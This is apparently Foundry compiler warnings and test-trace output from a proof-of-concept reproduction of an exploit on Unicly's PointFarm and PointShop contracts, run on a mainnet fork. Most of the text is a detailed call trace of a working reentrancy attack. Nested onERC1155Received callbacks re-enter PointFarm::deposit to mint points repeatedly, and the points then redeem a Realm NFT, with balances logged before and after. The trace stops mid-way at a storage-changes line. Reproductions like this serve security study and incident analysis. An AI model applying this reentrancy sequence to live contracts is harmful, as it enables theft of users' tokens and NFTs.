Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/uniclyNFT_exp.sol:31:5:
   |
31 |     IERC20 private constant WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:102:9:
    |
102 |         address operator,
    |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:103:9:
    |
103 |         address from,
    |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:104:9:
    |
104 |         uint256 id,
    |         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:105:9:
    |
105 |         uint256 value,
    |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:106:9:
    |
106 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:116:9:
    |
116 |         address operator,
    |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:117:9:
    |
117 |         address from,
    |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:118:9:
    |
118 |         uint256 tokenId,
    |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-09/uniclyNFT_exp.sol:119:9:
    |
119 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
   --> src/test/2023-09/uniclyNFT_exp.sol:115:5:
    |
115 |     function onERC721Received(
    |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 490.65ms (4.18ms CPU time)

Ran 1 test for src/test/2023-09/uniclyNFT_exp.sol:ContractTest
[PASS] testExploit() (gas: 644255)
Logs:
  Attacker Realm NFT balance before attack: 0
  Attacker WETH balance after attack: 0.497010711179183339
  Attacker Realm NFT balance after attack: 1

Traces:
  [7990] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18133171 [1.813e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(uJENNY: [0xa499648fD0e80FD911972BbEb069e4c20e68bF22], "uJENNY")
    │   └─ ← [Return]
    ├─ [0] VM::label(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], "uJENNY_WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], "PointFarm")
    │   └─ ← [Return]
    ├─ [0] VM::label(PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], "PointShop")
    │   └─ ← [Return]
    ├─ [0] VM::label(Realm: [0x7AFe30cB3E53dba6801aa0EA647A0EcEA7cBe18d], "Realm")
    │   └─ ← [Return]
    └─ ← [Stop]

  [810584] ContractTest::testExploit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x00000000000000000000000000000000000000000000000006f05b59d3b20000)
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 500000000000000000 [5e17]
    ├─ [24726] uJENNY::approve(PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xc0170f017da7db1b2d7360c1d67e77b3f4258bc514bc80ae1e8c4facbfbba193: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [2504] uJENNY_WETH::getReserves() [staticcall]
    │   └─ ← [Return] 1696372386728726884130933 [1.696e24], 239196125549026391203 [2.391e20], 1694385755 [1.694e9]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 500000000000000000 [5e17]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 500000000000000000 [5e17]
    ├─ [8062] WETH::transfer(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], 500000000000000000 [5e17])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], value: 500000000000000000 [5e17])
    │   ├─  storage changes:
    │   │   @ 0xd9c7e274d6c467a9002e59fd9fa41e99e2e28d3c9cd0500bf4bd2b4d441a0bef: 0x00000000000000000000000000000000000000000000000cf78358df1774b4a3 → 0x00000000000000000000000000000000000000000000000cfe73b438eb26b4a3
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000006f05b59d3b20000 → 0
    │   └─ ← [Return] true
    ├─ [62585] uJENNY_WETH::swap(3527995810700000234095 [3.527e21], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [30252] uJENNY::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3527995810700000234095 [3.527e21])
    │   │   ├─ emit Transfer(from: uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3527995810700000234095 [3.527e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f
    │   │   │   @ 0x906f45f73eac08696244b37e5bf5d479cd4d54e5d89241a3dd9ffe6d92395c5d: 0x0000000000000000000000000000000000000000000167388806abac87ae2075 → 0x000000000000000000000000000000000000000000016679473fb1f717e61606
    │   │   └─ ← [Return] true
    │   ├─ [542] uJENNY::balanceOf(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d]) [staticcall]
    │   │   └─ ← [Return] 1692844390918026883896838 [1.692e24]
    │   ├─ [534] WETH::balanceOf(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d]) [staticcall]
    │   │   └─ ← [Return] 239696125549026391203 [2.396e20]
    │   ├─ emit Sync(reserve0: 1692844390918026883896838 [1.692e24], reserve1: 239696125549026391203 [2.396e20])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 500000000000000000 [5e17], amount0Out: 3527995810700000234095 [3.527e21], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x64fe465b00000000000cf78358df1774b4a30000000167388806abac87ae2075 → 0x6502bcb300000000000cfe73b438eb26b4a3000000016679473fb1f717e61606
    │   │   @ 9: 0x000000000000000000000000000000004d932bbbd046dec33a2d28d56b93c680 → 0x000000000000000000000000000000004dbc67fbf000c1b75e2fe839579d2108
    │   │   @ 10: 0x00000000000000000000000000623ec0b5b95c80817e4a2f8f6f4a5d82dec4cf → 0x0000000000000000000000000062ba5f1462e3c189a3ff68c49f23406080e237
    │   └─ ← [Stop]
    ├─ [542] uJENNY::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3527995810700000234095 [3.527e21]
    ├─ [542] uJENNY::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3527995810700000234095 [3.527e21]
    ├─ [97071] PointFarm::deposit(0, 3527995810700000234095 [3.527e21])
    │   ├─ [2542] uJENNY::balanceOf(PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67]) [staticcall]
    │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   ├─ emit UpdatePool(: 0)
    │   ├─ [9149] uJENNY::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], 3527995810700000234095 [3.527e21])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], value: 3527995810700000234095 [3.527e21])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], value: 115792089237316195423570985008687907853269984665640564035929588197213129405840 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f → 0
    │   │   │   @ 0x3969f4fbe87441af4161659476c0b5d8f600d6afa5dcf1a86d5df3ddd7f45ab2: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x0000000000000000000000000000000000000000000002dd5aa7c37022080a6f
    │   │   │   @ 0xc0170f017da7db1b2d7360c1d67e77b3f4258bc514bc80ae1e8c4facbfbba193: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffff40bf39064a9037f590
    │   │   └─ ← [Return] true
    │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 3527995810700000234095 [3.527e21])
    │   ├─  storage changes:
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b0: 0x0000000000000000000000000000000000000000000000000000000000cee468 → 0x000000000000000000000000000000000000000000000000000000000114b0b3
    │   │   @ 0xc0170f017da7db1b2d7360c1d67e77b3f4258bc514bc80ae1e8c4facbfbba193: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffff40bf39064a9037f590
    │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8638: 0 → 0x0000000000000000000000000000000000000000000000000000000000189a06
    │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8637: 0 → 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b1: 0 → 457
    │   └─ ← [Stop]
    ├─ [0] VM::roll(18149401 [1.814e7])
    │   └─ ← [Return]
    ├─ [2686] Realm::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Attacker Realm NFT balance before attack", val: 0)
    ├─ [64415] PointFarm::deposit(0, 0)
    │   ├─ [542] uJENNY::balanceOf(PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67]) [staticcall]
    │   │   └─ ← [Return] 13527995810700000234095 [1.352e22]
    │   ├─ emit UpdatePool(: 0)
    │   ├─ emit TransferSingle(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], id: 0, value: 3528)
    │   ├─ [29741] ContractTest::onERC1155Received(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, 0, 3528, 0x)
    │   │   ├─ [688] PointFarm::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [staticcall]
    │   │   │   └─ ← [Return] 3528
    │   │   ├─ [25762] PointFarm::deposit(0, 0)
    │   │   │   ├─ emit TransferSingle(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], id: 0, value: 3528)
    │   │   │   ├─ [16444] ContractTest::onERC1155Received(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, 0, 3528, 0x)
    │   │   │   │   ├─ [688] PointFarm::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 7056
    │   │   │   │   ├─ [12465] PointFarm::deposit(0, 0)
    │   │   │   │   │   ├─ emit TransferSingle(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], id: 0, value: 3528)
    │   │   │   │   │   ├─ [3147] ContractTest::onERC1155Received(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, 0, 3528, 0x)
    │   │   │   │   │   │   ├─ [688] PointFarm::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10584 [1.058e4]
    │   │   │   │   │   │   └─ ← [Return] 0xf23a6e61
    │   │   │   │   │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8fad4ead009ee0871225589e4ed78ca414dedc46d6fec5047791fea191c079d0: 7056 → 10584
    │   │   │   │   │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8638: 0x0000000000000000000000000000000000000000000000000000000000189a06 → 0x000000000000000000000000000000000000000000000000000000000018a7ce
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] 0xf23a6e61
    │   │   │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8fad4ead009ee0871225589e4ed78ca414dedc46d6fec5047791fea191c079d0: 3528 → 7056
    │   │   │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8638: 0x0000000000000000000000000000000000000000000000000000000000189a06 → 0x000000000000000000000000000000000000000000000000000000000018a7ce
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return] 0xf23a6e61
    │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 0)
    │   ├─  storage changes:
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b0: 0x000000000000000000000000000000000000000000000000000000000114b0b3 → 0x000000000000000000000000000000000000000000000000000000000114f019
    │   │   @ 0x8fad4ead009ee0871225589e4ed78ca414dedc46d6fec5047791fea191c079d0: 0 → 3528
    │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8638: 0x0000000000000000000000000000000000000000000000000000000000189a06 → 0x000000000000000000000000000000000000000000000000000000000018a7ce
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b1: 457 → 458
    │   └─ ← [Stop]
    ├─ [29798] PointFarm::withdraw(0, 3527995810700000234095 [3.527e21])
    │   ├─ [23452] uJENNY::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3527995810700000234095 [3.527e21])
    │   │   ├─ emit Transfer(from: PointFarm: [0xd3C41c85bE295607E8EA5c58487eC5894300ee67], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3527995810700000234095 [3.527e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f
    │   │   │   @ 0x3969f4fbe87441af4161659476c0b5d8f600d6afa5dcf1a86d5df3ddd7f45ab2: 0x0000000000000000000000000000000000000000000002dd5aa7c37022080a6f → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   └─ ← [Return] true
    │   ├─ emit Withdraw(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 3527995810700000234095 [3.527e21])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f
    │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8638: 0x000000000000000000000000000000000000000000000000000000000018a7ce → 0
    │   │   @ 0xb497e92afc8fe1558c404744cc53466ec65039bed50603bf2a75e2908f4d8637: 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f → 0
    │   └─ ← [Stop]
    ├─ [504] uJENNY_WETH::getReserves() [staticcall]
    │   └─ ← [Return] 1692844390918026883896838 [1.692e24], 239696125549026391203 [2.396e20], 1694678195 [1.694e9]
    ├─ [3552] uJENNY::transfer(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], 3527995810700000234095 [3.527e21])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], value: 3527995810700000234095 [3.527e21])
    │   ├─  storage changes:
    │   │   @ 0x906f45f73eac08696244b37e5bf5d479cd4d54e5d89241a3dd9ffe6d92395c5d: 0x000000000000000000000000000000000000000000016679473fb1f717e61606 → 0x0000000000000000000000000000000000000000000167388806abac87ae2075
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000bf40c6f9b56fc80a6f → 0
    │   └─ ← [Return] true
    ├─ [36291] uJENNY_WETH::swap(0, 497010711179183339 [4.97e17], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [23162] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 497010711179183339 [4.97e17])
    │   │   ├─ emit Transfer(from: uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 497010711179183339 [4.97e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xd9c7e274d6c467a9002e59fd9fa41e99e2e28d3c9cd0500bf4bd2b4d441a0bef: 0x00000000000000000000000000000000000000000000000cfe73b438eb26b4a3 → 0x00000000000000000000000000000000000000000000000cf78df79d21c06fb8
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000006e5bc9bc96644eb
    │   │   └─ ← [Return] true
    │   ├─ [542] uJENNY::balanceOf(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d]) [staticcall]
    │   │   └─ ← [Return] 1696372386728726884130933 [1.696e24]
    │   ├─ [534] WETH::balanceOf(uJENNY_WETH: [0xEC5100AD159F660986E47AFa0CDa1081101b471d]) [staticcall]
    │   │   └─ ← [Return] 239199114837847207864 [2.391e20]
    │   ├─ emit Sync(reserve0: 1696372386728726884130933 [1.696e24], reserve1: 239199114837847207864 [2.391e20])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 3527995810700000234095 [3.527e21], amount1In: 0, amount0Out: 0, amount1Out: 497010711179183339 [4.97e17], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x6502bcb300000000000cfe73b438eb26b4a3000000016679473fb1f717e61606 → 0x6502bcb300000000000cf78df79d21c06fb80000000167388806abac87ae2075
    │   └─ ← [Stop]
    ├─ [24664] PointFarm::setApprovalForAll(PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], true)
    │   ├─ emit ApprovalForAll(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], operator: PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], approved: true)
    │   ├─  storage changes:
    │   │   @ 0xe2c26ae46128a8c47b66026edcd05922e78bf4b85f7c6194ac4a17d9e9c38a7f: 0 → 1
    │   └─ ← [Stop]
    ├─ [135429] PointShop::redeem(uJENNY: [0xa499648fD0e80FD911972BbEb069e4c20e68bF22], 0)
    │   ├─ [2602] PointFarm::shopIDs(uJENNY: [0xa499648fD0e80FD911972BbEb069e4c20e68bF22]) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [4912] PointFarm::burn(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 10000 [1e4])
    │   │   ├─ emit TransferSingle(operator: PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, id: 0, value: 10000 [1e4])
    │   │   ├─  storage changes:
    │   │   │   @ 0x8fad4ead009ee0871225589e4ed78ca414dedc46d6fec5047791fea191c079d0: 10584 → 584
    │   │   └─ ← [Stop]
    │   ├─ [2594] Realm::supportsInterface(0x01ffc9a7) [staticcall]
    │   │   └─ ← [Return] true
    │   ├─ [2594] Realm::supportsInterface(0xffffffff) [staticcall]
    │   │   └─ ← [Return] false
    │   ├─ [2594] Realm::supportsInterface(0xd9b67a26) [staticcall]
    │   │   └─ ← [Return] false
    │   ├─ [100603] Realm::transferFrom(PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4689)
    │   │   ├─ emit Approval(owner: PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], approved: 0x0000000000000000000000000000000000000000, tokenId: 4689)
    │   │   ├─ emit Transfer(from: PointShop: [0xcDCc535503CBA9286489b338b36156b4b75008f6], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], tokenId: 4689)
    │   │   ├─  storage changes:
